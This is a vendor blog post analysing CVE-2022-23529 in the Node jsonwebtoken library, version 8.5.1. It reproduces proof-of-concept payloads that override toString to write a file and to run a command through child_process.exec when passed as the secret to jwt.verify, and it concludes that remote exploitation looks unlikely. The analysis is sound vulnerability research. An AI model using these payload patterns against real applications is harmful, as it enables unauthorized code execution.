Pricing
Contact
Login
Start Free Trial
Back

JWT Arbitrary Command Execution - CVE-2022–23529

Jan 12, 2023

Introduction

Arbitrary command execution has been found in JsonWebToken version 8.5.1 and lower, and registered as CVE-2022–23529

Library details

  • Description:

JSON Web Token (JWT) is an open standard (RFC 7519) that defines a compact and self-contained way for securely transmitting information between parties as a JSON object. This information can be verified and trusted because it is digitally signed. JWTs can be signed using a secret (with the HMAC algorithm) or a public/private key pair using RSA or ECDSA.

  • Website: https://jwt.io/

  • Source code: https://github.com/auth0/node-jsonwebtoken

The vulnerability

When a user access some page, the token will be passed to verify the method in the back-end. so what happens is that verify method takes three parameters token, secretOrPublickKey, [options, callback].

you can pass a payload to the second parameter and that payload will be executed.

The End Game

Based on what unit42 discovered and also based on my analysis it’s not easy or obvious how to achieve full RCE.

I want to show the analysis I did here, my final thoughts explaining why I don’t think RCE or I don’t see real exploitation behind it.

Maybe I’m wrong, or Maybe I’m right :D Who knows!

Prerequisites

  • Download nodejs

sudo apt install nodejs
  • Download npm

sudo apt install npm
  • Download jsonwebtoken version 8.5.1 or earlier.

npm i jsonwebtoken@8.5.1 

  • Understanding of how jsonwebtoken works?

I won’t go into detail here, but I will explain the basics of the structure of JWT and how it works.

I will provide references so you can dive in depth with it if you like.

Basically, JWT token consists of three parts 

  • Header: Algorithm & Token Type

  • Payload: Data

  • Verify Signature

Example:

When the user login in, the request with username and password go to Auth server, and the Auth server will verify and check the username and password based on that it will generate JWT Token for this user.

Now each time the user visits any page or route, the JWT token will be associated with the request headers.

https://dev.to/kcdchennai/how-jwt-json-web-token-authentication-works-21e7

https://jwt.io/introduction

Dynamic Analysis

I started with reproducing what unit42 already explained.

I’m using ubuntu, so you can start nodejs by typing the command

nodejs

Import jsonwebtoken.

jwt = require('jsonwebtoken');

Generate token

token = jwt.sign({"x":"y"}, 'some_secret');

This is the payload they used

var mal_obj = { toString : ()=> {console.log('PWNED!!!');process.on('exit', ()=> {require('fs').writeFileSync('malicious.txt', 'PWNED!!!!');});process.exit(0)}}

Now, pass the token and payload variable to verify 

jwt.verify(token, mal_obj)

You will see PWNED!!! printed on the console.

Also, a file called malicious.txt has been created

Also “PWNED!!!!” has been written inside the file

This happened because this is what the payload we executed does.

I also wanted to see if I can execute commands, so I used this payload

var mal_obj = { toString : ()=> {process.on('exit', ()=> {require('child_process').exec('firefox');});process.exit(0)}};

and I got firefox launched.

Static Analysis

Let’s do some code review and see what went wrong

Download the source code of JWT 8.5.1 from here:

https://github.com/auth0/node-jsonwebtoken/releases/tag/v8.5.1

Open verify.js 

here is where the vulnerable snippet of the code based on unit42 report.

After I tried to craft/edit/manipulate the JWT token, it didn’t really work.

in fact, it makes sense why it didn’t work because the payload supposes to go into the second parameter in the verify method where it’s marked in red, but the token is the first parameter, it’s marked in blue.

Final thoughts

To be honest, I’m not sure how this can be exploited remotely or even if you have access to the backend. However, based on what’s mentioned in “Exploitation Prerequisites” section in unit42 report it looks like there is no obvious scenario to exploit this.

Also based on the comments in the GitHub commit here it looks like a lot of people agree on that as well.

Some ideas for more in-depth research I was thinking about:

  • Maybe finding some misconfiguration scenario for JWT would help with exploiting this vulnerability.

  • I was thinking, about how those parameters get stored? for example in smart contracts variables are in memories like in slides. so you can overwrite the second variable in our case the secretOrPublicKey variable.

#jwt #cve #analysis #CVE-2022-23529

Tags

  • #cve

  • #analysis

  • #vicarius_blog

  • #CVE-2022-23529

  • #jwt

users/photos/cl9eol3ua2l7i0llg9fft6uoq.jpg

Written by

Mohammad Hussam Alzeyyat

Recent Posts

  • 1

    CVE-2023–23752: Joomla Unauthorized Access Vulnerability

    Mohammad Hussam Alzeyyat March 24, 2023
  • 2

    Apache Zero Days - Apache Spark Command Injection Vulnerability (CVE-2022-33891)

    Mudassar Zafar March 22, 2023
  • 3

    CVE-2022-44666: Microsoft Windows Contacts (VCF/Contact/LDAP) syslink control href attribute escape vulnerability

    j00sean (https://twitter.com/j00sean) March 01, 2023
  • 4

    KeePass Passwords Theft CVE-2023-240550

    Youssef Muhammad March 01, 2023
  • 5

    CVE-2022–44267: Denial Of Service in ImageMagick

    Mohammad Hussam Alzeyyat February 28, 2023

Related Posts

By Mohammad Hussam Alzeyyat
Mar 24, 2023

CVE-2023–23752: Joomla Unauthorized Access Vulnerability

In this blog, we are going to analyze the information disclosure in Joomla that allows an attacker to exploit it to gain unauthorized access. we will dive deep inside the flow of Joomla, how it works, and how the vulnerability happened.
By Mudassar Zafar
Mar 22, 2023

Apache Zero Days - Apache Spark Command Injection Vulnerability (CVE-2022-33891)

The Apache Spark command injection vulnerability (CVE-2022-33891) was discovered by the Sangfor FarSight Labs team and reported to the Apache Spark project team on July 18, 2022. The vulnerability was classified as high severity, with a CVSS (Common Vulnerability Scaling System) Base Score of 8.8, indicating a high potential impact.
By j00sean (https://twitter.com/j00sean)
Mar 01, 2023

CVE-2022-44666: Microsoft Windows Contacts (VCF/Contact/LDAP) syslink control href attribute escape vulnerability

My thoughts and more on this bug!
last_chanse_04.png

Start Closing Security Gaps

  • Risk reduction from Day 1
  • Fast set-up and deployment
  • Unified platform
  • Full-featured 14-day trial
Get a Demo
Start Free Trial!

Have questions?

By submitting this form, you agree to be contacted about TOPIA and other Vicarius products.

Vicarius develops an autonomous vulnerability remediation platform to help security teams protect their assets against software exploitation. Consolidating vulnerability assessment, prioritization, and remediation, Vicarius strengthens cyber hygiene and proactively reduces risk.
We're hiring!

Support

support@vicarius.io

Sales

sales@vicarius.io

Marketing

info@vicarius.io
Product
Product Overview
Vulnerability Management
Patch Management
Patchless Protection
Auto Actions
Network Scanner
xTags
0-Day Detection
Solution
Solution Overview
Case Studies
Knowledge
Research Center
Apps & OS Patch Catalog
Videos
Articles
Docs
Company
About
Investors
Partners
Trust
Careers
Pricing
Pricing
Compare
TOPIA vs. Automox
TOPIA vs. ManageEngine
TOPIA vs. Rapid7
TOPIA vs. Tenable
TOPIA vs. Tanium
TOPIA vs. RMMs
TOPIA vs. Vulcan
TOPIA vs. PDQ
TOPIA vs. Qualys

Copyright © Vicarius. All rights reserved 2022. Privacy Policy and Terms of Use